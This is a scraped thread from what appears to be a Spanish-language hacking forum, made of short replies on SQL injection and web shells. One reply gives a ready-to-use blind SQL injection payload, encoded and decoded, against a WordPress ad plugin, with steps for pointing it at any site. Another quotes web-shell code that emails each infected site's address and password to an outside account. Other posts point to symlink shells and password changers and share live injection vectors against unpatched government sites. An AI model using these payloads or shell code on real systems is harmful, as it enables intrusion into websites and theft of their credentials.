saludos compa;

me has dejao 

sigue asi compa vas bien

saludos,

aer me apunto si se puede aun 

Switch.pm 

vaya problemon para windows...

estoy en la busqueda de este libro:

Desarrollo Web con PHP 6, Apache y MySQL
Timothy Boronczyk, Elizabeth Naramore, Jason Gerner, Yann Le Scouarnec, Jeremy Stolz y Michael K. Glass


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

saludos compa;

haz lo siguiente:

http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj

http://www.AQUITUWEB.com/wp-content/plugins/adrotate/adrotate-out.php?track= <-- AQUI ESTO:

MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj

ESTO:

MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj

ES ESTO:

1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#

lo cual esta encodeado en based64


si no entendistes como funciona.....  vas a tener que leeerrr y mucho..... o mejor te dedicas a otras cosas... 


saludos;

Leyendo aer como esta... 

saludos,

para complementar tu post te agrego una version con Bypass name.conf


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Nota: hay otras tool para auto symlink

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hay que enseñarles a ofuscar código a estos juakerz

$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);

este es un descarado...... ----> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta@gmail.com

el clasico LOAD_FILE()   


aer cuando no puedes ver o provocar el error y ver el path o Document Root...!!!!


tambien tenes que aprovechar de explicar INTO OUTFILE para culminar el tuto...

pero ta bueno

Ok soy novato en este asunto pero puedo participar, me apunto....

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Lo hago publico con la finalidad de darle una mano a la gente que quiere aprender y ver vectores reales y puedan probar o hacerse a la idea de distintas formas de hacer sqli, y el plus se lo doy ya que son webs del gobierno y llegado el momento que haga el tiempito, voy a empesar a reportar todo mientras tanto y mientras no se reparen los fallos pueden ir testeando, he publicado otras sqli con waf bypass, para justamente ayudar a otras personas a experimentar y ver otros vectores. Varios amigos han podido aplicar otros metodos como double error y otros metodos de filtrado de waf del los cuales tambien he aprendido cosas muy utiles al estudiar sus vectores, y asi tanto yo como la gente que quiera investigar un poco mas podemos hacer un reflujo de conocimiento, y pasarnos vectores personalizados y nuevos para ir aprendiendo.

Ademas le doy un poco mas de vida a la sección!

Saludos compa;

estoy totalmente de acuerdo con lo que dices; el compartir conocimientos e intercambiar ideas...!!!, haciendo asi que otro se interesen en el tema como los que se estaban realizando en los wargames donde se colocaban Retos con el fin meramente educativo... de escenarios reales...
para dejar volar la imaginacion y los conocimientos en cuanto a los diversos retos.., lo que si no comparto es la publicacion del vector... asi se pierde la magia, el encanto, no dejas que la curiosidad de como obtener el vector, y solo facilitas lameradas como me dijeron alguna vez con respecto a una web gubernamental...

d688e36a56abaacd19c9f0fd2ac32be88def71f2956ed0a2770b2f3830237588a4dad03af5f140c55fcbbba86e6fe727fda37103523385a6b9936cf7f974df8d

a mi tambien me da:
SHA512

  muy bueno....!!! 

Esta dura la cosa, ahy que leer y buscar comodines...

Nota: gradecimientos al compa por su orientacion...

es muy bueno compa;

Cita de: [Corruptedyte link=topic=17301.msg59408#msg59408 date=1370390281]
En mis tiempos (cuando entraba a este foro) la gente tenia mas nivel y no publicaban cosas tan tan basicas, otra cosa en mis tiempos tambien a Mysql, PostgreSQL, etc... no se le llamaban bases de datos, se les llamaban SGBD...

jajajajaja ya empezo la elite a criticar....!!! los aportes de los demas...

o sera que nunca lo habian hecho tambien y se recuerdan de aquellos tiempos de n00bs cuan do publicaban republicaciones retraducidas del ingles al español para darselas de elite....


saludos;

nota: sin animo de ofender, el qque le pique que se rasque...!!!

  me voy enterando 

  Interesante...!!! 

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Alguna pequeña explicacion de su uso?, funciona con todas las paginas que usan joomla o deben tener un plugin especifico para que la vulnerabilidad funcione?

si por favor....   

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola man, mira para symlinik hay varias herramientas que te podrian simplificar el trabajo y que no sea tan aburrido xD
Aca te dejo 1 shell para hacer symlink:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Es tan simple como darle a Domain&Script y despues usar el wordpress password changer y el joomla password changer
Espero haberte ayudado...
SombrA
   

woowww

eres un capo wey....